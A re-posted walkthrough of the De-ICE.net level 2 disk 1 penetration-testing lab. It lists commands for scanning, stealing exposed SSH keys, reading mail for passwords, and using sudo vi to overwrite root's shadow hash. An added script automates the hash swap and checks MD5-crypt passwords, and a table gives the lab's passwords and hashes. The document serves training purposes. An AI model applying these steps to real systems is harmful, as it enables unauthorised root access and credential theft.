Monday, September 12, 2011

HOWTO : De-ICE.net v2.0 (1.100) {Level 2 - Disk 1}

*** Do NOT attack any computer or network without authorization, or you may end up in jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work, not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.

The original post is here

Links

Watch video on-line
Download video

What is this?

This is my walkthrough of how I broke into the De-ICE.net network, level 2, disk 1.

The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.

What do I need?

BackTrack 4 (Final)
de-ice.net-2.100-1.1.iso (MD5: 09798f85bf54a666fbab947300f38163)
Dictionary(s)

Software
Name: De-ICE.net
Version: 2.0 (Level 2 - Disk 1 - IP Address: 1.100)
Home Page: http://www.de-ice.net or http://heorot.net/livecds/

Download Link:

http://heorot.net/instruction/tutorials/iso/de-ice.net-2.100-1.1.iso
http://www.mediafire.com/file/uyecnhvkeije0br/de-ice.net-2.100-1.0.part1.rar
http://www.mediafire.com/file/l2ezefrg05mmtrr/de-ice.net-2.100-1.0.part2.rar

Forums/Support: http://forums.heorot.net and http://forums.heorot.net/viewtopic.php?f=18&t=16
WiKi/Support: http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks

Commands

nmap -n 192.168.2.1-255

nmap -n -sV -sS -O 192.168.2.100

nmap -n -sV -sS -O 192.168.2.101

firefox 192.168.2.100

[+]kate -> build a list of possible usernames from the names found on the site. Save as usernames.txt

firefox 192.168.2.101

[+]BackTrack -> Vulnerability Identification -> Fuzzers -> JBroFuzz. Web Directories -> list of usernames (+ root, admin) with '~' in front -> http://192.168.2.101 -> 80



firefox http://192.168.2.101/~pirrip

[+]kate -> Update usernames.txt, keeping only the ones whose ~user directory answered. Save.

[+]BackTrack -> Web Application Analysis -> Web (frontend) -> nikto2

./nikto.pl -host 192.168.2.101 -r ~pirrip/ -Display 124

firefox http://192.168.2.101/~pirrip/.ssh

// Save both files (id_rsa and id_rsa.pub); Firefox drops them in /root/

mv /root/id_rsa /root/.ssh/id_rsa

mv /root/id_rsa.pub /root/.ssh/id_rsa.pub

chmod 000 /root/.ssh/id_rsa

chmod 000 /root/.ssh/id_rsa.pub
// ssh refuses a private key that is readable by group or other. Mode 000 passes that check here only because BackTrack runs as root, which bypasses file permissions; 600 is the conventional mode.

ssh pirrip@192.168.2.100
// Answer "yes" to the host-key prompt; the downloaded private key logs us in as pirrip without a password

mailx
// Message 3: havisham's password is 'changeme'. Message 7: pirrip's password is '0l1v3rTw1st'

cd /etc/

vi passwd

// kate -> Update usernames with only valid ones.

vi group

sudo vi shadow
// sudo password: 0l1v3rTw1st. Keystrokes: D, :22,22y, :put, i, root, ESC, ESC, d + [->], [up], dd. The effect is to replace root's hash with pirrip's, so root's password becomes 0l1v3rTw1st. Save (:w) and exit (:q).
// An editor allowed through sudo is root-equivalent: anyone who can run vi as root can rewrite /etc/shadow or /etc/sudoers.

su
// Password: 0l1v3rTw1st
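The vi keystrokes above are hard to follow, so here is the same shadow manipulation done explicitly on a copy of the file, plus the check a tester would run first (does sudo let this account run an editor?) and a way to confirm a recovered password against an MD5-crypt hash. This is an added example for this re-post, not g0tmi1k's code; the sample entries are the ones from the Users table at the end of the post, the function names are mine, and the hash check assumes openssl is installed.

```shell
#!/bin/sh
# Added example: what "sudo vi shadow" achieves, performed on a copy of
# /etc/shadow with awk so the field handling is visible.

# Print field 2 (the password hash) of a user's shadow entry.
shadow_hash() {
    user="$1"; file="$2"
    awk -F: -v u="$user" '$1 == u { print $2; exit }' "$file"
}

# Write a copy of $file to $out in which $dst's hash is replaced by $src's,
# every other field untouched. This is the whole escalation: with pirrip
# allowed to run vi through sudo, root's hash is overwritten with pirrip's,
# after which "su" accepts pirrip's password for root.
shadow_copy_hash() {
    src="$1"; dst="$2"; file="$3"; out="$4"
    h=$(shadow_hash "$src" "$file")
    [ -n "$h" ] || { echo "no entry for $src" >&2; return 1; }
    awk -F: -v OFS=: -v d="$dst" -v h="$h" '$1 == d { $2 = h } { print }' "$file" > "$out"
}

# Check to run first on the target: can this account run an editor as root?
# Any editor in sudoers (vi included) can write /etc/shadow and /etc/sudoers
# or spawn a root shell with :!sh, so a match here means root is one edit away.
sudo_allows_editor() {
    sudo -n -l 2>/dev/null | grep -Eq '(^|[ /,])(vi|vim|nano|emacs|ed)([ ,]|$)'
}

# Confirm a recovered password against a user's MD5-crypt ($1$salt$hash)
# entry by recomputing it with openssl. Returns 0 on match, 1 on mismatch,
# 2 if openssl is not available.
shadow_verify_md5crypt() {
    user="$1"; password="$2"; file="$3"
    command -v openssl >/dev/null 2>&1 || return 2
    h=$(shadow_hash "$user" "$file")
    salt=$(printf '%s' "$h" | cut -d'$' -f3)
    [ "$(openssl passwd -1 -salt "$salt" "$password")" = "$h" ]
}

# Usage (on the target, as a user who can sudo an editor):
#   sudo cp /etc/shadow /tmp/shadow.orig
#   shadow_copy_hash pirrip root /tmp/shadow.orig /tmp/shadow.new
#   sudo cp /tmp/shadow.new /etc/shadow   # then: su, password 0l1v3rTw1st
```

The `$1$` prefix on every entry in the table marks MD5-crypt, which is fast to brute-force offline; the page's dictionary step is exactly that attack, and the verify function is how you confirm a candidate without logging in.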

cd /root/

ls -a

cd .save/

ls -a

chmod -R 777 /root/
// so that the scp session below, running as pirrip, can read /root/.save

//In BackTrack//

scp pirrip@192.168.2.100:/root/.save/great_expectations.zip /root/

unzip great_expectations.zip

tar xf great_expectations.tar

strings Jan08

//In SSH//
sudo vi /var/mail/havisham

modprobe capability
// on the target, as root: load the capability kernel module before trying the FTP login below

//In BackTrack//
ftp 192.168.2.100
// Username: pirrip. Password: 0l1v3rTw1st //

ls -a

//In SSH//

exit


//In BackTrack//

[+]Firefox -> Send a REAL email to: philip.pirrip.ge@gmail.com
// GAME OVER

----------------------------------------------------------------------------------------------------
Users (username:password on the left, the matching /etc/shadow entry on the right; magwitch's password was not recovered)
root:P1ckw1ckP@p3rs      root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
havisham:changeme        havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
pirrip:0l1v3rTw1st       pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch:                magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
----------------------------------------------------------------------------------------------------


Notes

Dictionaries : http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html

That's all! See you.